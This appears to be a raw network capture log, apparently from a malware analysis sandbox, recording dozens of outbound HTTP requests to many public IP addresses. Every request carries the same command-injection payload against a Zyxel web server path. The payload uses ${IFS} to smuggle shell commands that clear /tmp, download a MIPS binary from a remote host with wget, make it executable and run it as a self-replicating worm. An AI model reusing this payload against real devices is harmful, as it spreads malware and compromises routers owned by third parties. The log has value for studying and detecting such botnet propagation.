                                          Jan 14, 2024 15:46:12.911937952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3512192.168.2.2335464198.107.205.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911997080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3513192.168.2.234845025.221.242.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912028074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3514192.168.2.234284681.79.78.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912045002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3515192.168.2.2357084204.36.253.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912081003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3516192.168.2.236020034.1.179.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912108898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3517192.168.2.2344434181.10.192.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912120104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3518192.168.2.234838070.51.232.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912148952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3519192.168.2.2340786163.76.132.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912205935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3520192.168.2.233501476.248.74.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912242889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3521192.168.2.2340794124.122.5.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912275076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3522192.168.2.2360630135.132.101.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912313938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3523192.168.2.2360348208.178.189.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912348986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3524192.168.2.2353740135.252.15.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912381887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3525192.168.2.233723414.206.64.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912417889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3526192.168.2.2355382188.78.41.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912483931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3527192.168.2.23515789.121.37.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912518024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3528192.168.2.235821843.245.217.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912552118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3529192.168.2.233880242.241.110.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912575960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3530192.168.2.233845449.119.4.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912602901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3531192.168.2.235437441.98.55.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912631035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3532192.168.2.2339530133.29.189.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912656069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3533192.168.2.234550459.255.142.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912717104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3534192.168.2.2334956136.64.78.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912733078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3535192.168.2.233481423.112.154.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912789106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3536192.168.2.234564261.70.27.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912826061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3537192.168.2.233994863.95.193.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912849903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3538192.168.2.2333034102.155.140.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912873030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3539192.168.2.2349422223.141.60.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912930965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3540192.168.2.2347036108.188.134.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.912972927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3541192.168.2.235708095.188.14.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913012981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3542192.168.2.23486769.40.206.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913050890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3543192.168.2.234746440.228.124.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913086891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3544192.168.2.2346984100.200.224.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913131952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3545192.168.2.2355932147.0.64.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913161039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3546192.168.2.235479668.212.48.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913192034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3547192.168.2.235987289.242.31.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913242102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3548192.168.2.2334906221.81.45.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913270950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3549192.168.2.2351958118.169.64.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913294077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3550192.168.2.2353320198.199.4.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913320065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3551192.168.2.2335984166.10.102.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913350105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3552192.168.2.23518825.240.230.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913389921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3553192.168.2.2348346164.171.233.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913423061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3554192.168.2.234697258.65.244.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913438082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3555192.168.2.2344778198.102.119.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913455963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3556192.168.2.23589989.238.86.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913516045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3557192.168.2.233816090.67.204.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913536072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3558192.168.2.235526434.173.62.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913578033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3559192.168.2.234212470.121.17.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913613081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3560192.168.2.2354478187.200.14.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913642883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3561192.168.2.23606889.198.234.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913672924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3562192.168.2.233556043.56.27.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913703918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3563192.168.2.234530249.91.243.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913744926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3564192.168.2.23331301.232.252.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913773060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3565192.168.2.2358782158.155.151.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913800955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3566192.168.2.2352186102.85.21.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913861036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3567192.168.2.2333046139.234.246.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913897991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3568192.168.2.2338326132.84.160.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913928986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3569192.168.2.234663840.111.234.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913945913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3570192.168.2.2352604132.220.131.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.913978100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3571192.168.2.2353888208.209.31.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914001942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3572192.168.2.2354088190.19.209.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914022923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3573192.168.2.2343450144.95.177.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914064884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3574192.168.2.234975661.40.100.86443
                                          TimestampBytes transferredDirectionData
